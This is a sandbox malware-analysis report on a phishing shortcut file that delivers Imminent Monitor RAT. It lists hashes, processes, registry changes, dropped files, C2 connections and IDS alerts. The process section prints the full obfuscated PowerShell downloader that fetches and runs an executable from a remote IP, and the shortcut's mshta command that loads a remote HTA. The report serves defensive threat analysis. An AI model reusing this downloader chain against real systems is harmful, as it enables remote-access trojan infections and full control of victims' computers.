File name:

Scan_Payment.093943.lnk

Full analysis: https://app.any.run/tasks/86166521-6fbc-4aec-84a6-c137b0b05b5b
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: January 18, 2019, 08:36:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
rat
imminent
trojan
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=202, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
MD5:

CF4064BDA6B72DFB173872E68ECAABA8

SHA1:

34B38C168C9BE4F82D31966047BBBD3A6AB21A46

SHA256:

59D2882C4E2380F4E06A5DED77F70C81D55FA209A0239A2EF851B938634B424A

SSDEEP:

12:85Tm/3BVSXzzeMDdqW+feDCBdRy1M03+UcIl1lDmIfcI6iNL4t2YhT79PK8:85C/B4t+feSC3+/E4I0a581

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • mshta.exe (PID: 3332)
    • Application was dropped or rewritten from another process

      • LsHVnEAZ.exe (PID: 3060)
    • Detected Imminent RAT

      • RegAsm.exe (PID: 2592)
    • Connects to CnC server

      • RegAsm.exe (PID: 2592)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3192)
      • RegAsm.exe (PID: 2592)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3192)
    • Connects to unusual port

      • RegAsm.exe (PID: 2592)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3332)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: 202
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: mshta.exe
Description: gYPOKyEbC
RelativePath: ..\..\..\..\..\..\Windows\system32\mshta.exe
WorkingDirectory: %SYSTEMROOT%\System32
CommandLineArguments: http://185.205.210.205/ftp000/z.hta
IconFileName: C:\Windows\System32\imageres.dll
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start mshta.exe powershell.exe lshvneaz.exe no specs #IMMINENT regasm.exe wmiapsrv.exe no specs wmiapsrv.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2592"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
LsHVnEAZ.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
0
Version:
2.0.50727.5420 (Win7SP1.050727-5400)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\regasm.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\acgenral.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
3060"C:\Users\admin\AppData\Roaming\LsHVnEAZ.exe" C:\Users\admin\AppData\Roaming\LsHVnEAZ.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\roaming\lshvneaz.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
3140C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
WMI Performance Reverse Adapter
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wbem\wmiapsrv.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3192"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo $kMfLnTnVDLqQpks = [System.Environment]::OSVersion.Version | Select -Expand Major;$AMrxOauF = [System.Environment]::OSVersion.Version | Select -Expand Minor;$NaEuVr = "$kMfLnTnVDLqQpks" + '.' + "$AMrxOauF";$jlIcle = $PSVersionTable.PSVersion.Major;if($jlIcle -eq 2){$LHoxM = Get-Random -Minimum 5 -Maximum 10;$KRTwQ = -join ((65..90) + (97..122) | Get-Random -Count $LHoxM | % {[char]$_});$QFMrCfDmTOEORr = $KRTwQ + '.exe';$JcfADGBaVeU = "$env:APPDATA" + '\' + "$QFMrCfDmTOEORr";;;;;$BlHXuHlrmpvFMz = 'http://185.205.210.205/ftp000/im_Protected.exe';$xEhCbJucFZxZm = New-Object System.Net.WebClient;$mxrBcSEhtqbe = $xEhCbJucFZxZm.DownloadFile($BlHXuHlrmpvFMz, $JcfADGBaVeU)}elseif($jlIcle -ge 3){$LHoxM = Get-Random -Minimum 5 -Maximum 10;$KRTwQ = -join ((65..90) + (97..122) | Get-Random -Count $LHoxM | % {[char]$_});$QFMrCfDmTOEORr = $KRTwQ + '.exe';$JcfADGBaVeU = "$env:APPDATA" + '\' + "$QFMrCfDmTOEORr";;;;;$BlHXuHlrmpvFMz = 'http://185.205.210.205/ftp000/im_Protected.exe';Invoke-WebRequest -Uri $BlHXuHlrmpvFMz -OutFile $JcfADGBaVeU};Start-Process $JcfADGBaVeU;;""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3332"C:\Windows\system32\mshta.exe" http://185.205.210.205/ftp000/z.htaC:\Windows\system32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
3792C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
WMI Performance Reverse Adapter
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wbem\wmiapsrv.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
764
Read events
663
Write events
101
Delete events
0

Modification events

(PID) Process:(3332) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3332) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3332) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(3332) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(3192) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3192) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3192) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3192) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(3192) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(3192) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
Executable files
1
Suspicious files
11
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
3192powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0KZO0IIKGXLPPWV0N71W.temp
MD5:
SHA256:
2592RegAsm.exeC:\Users\admin\AppData\Roaming\Imminent\Logs\18-01-2019text
MD5:33BE604F8044D5984E8E3E3B694D710A
SHA256:3F785F1CC535B0987139623200C7910B2B28F92DFE3309E8E071C091D0CE7313
3332mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\z[1].htahtml
MD5:
SHA256:
2592RegAsm.exeC:\Users\admin\AppData\Roaming\Imminent\Monitoring\network.datbinary
MD5:
SHA256:
3192powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:
SHA256:
2592RegAsm.exeC:\Users\admin\AppData\Roaming\Imminent\Monitoring\system.datbinary
MD5:
SHA256:
3192powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19868b.TMPbinary
MD5:
SHA256:
2592RegAsm.exeC:\Users\admin\AppData\Roaming\Imminent\Geo.datbinary
MD5:
SHA256:
3192powershell.exeC:\Users\admin\AppData\Roaming\LsHVnEAZ.exeexecutable
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
9
DNS requests
2
Threats
15

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3192
powershell.exe
GET
185.205.210.205:80
http://185.205.210.205/ftp000/im_Protected.exe
BG
malicious
3332
mshta.exe
GET
200
185.205.210.205:80
http://185.205.210.205/ftp000/z.hta
BG
html
3.57 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2592
RegAsm.exe
23.81.246.2:9003
Nobis Technology Group, LLC
US
malicious
2592
RegAsm.exe
198.54.125.203:443
glowcryptos.com
Namecheap, Inc.
US
malicious
3332
mshta.exe
185.205.210.205:80
BelCloud Hosting Corporation
BG
malicious
2592
RegAsm.exe
45.55.57.244:443
www.iptrackeronline.com
Digital Ocean, Inc.
US
malicious
3192
powershell.exe
185.205.210.205:80
BelCloud Hosting Corporation
BG
malicious

DNS requests

Domain
IP
Reputation
www.iptrackeronline.com
  • 45.55.57.244
shared
glowcryptos.com
  • 198.54.125.203
malicious

Threats

PID
Process
Class
Message
3332
mshta.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious HTA application download
3332
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
3332
mshta.exe
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
3332
mshta.exe
Attempted User Privilege Gain
ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199
3332
mshta.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS MSXMLHTTP DL of HTA (Observed in CVE-2017-0199)
3192
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3192
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3192
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3192
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
2592
RegAsm.exe
A Network Trojan was detected
MALWARE [PTsecurity] Imminent Monitor RAT (outbound)
3 ETPRO signatures available at the full report
No debug info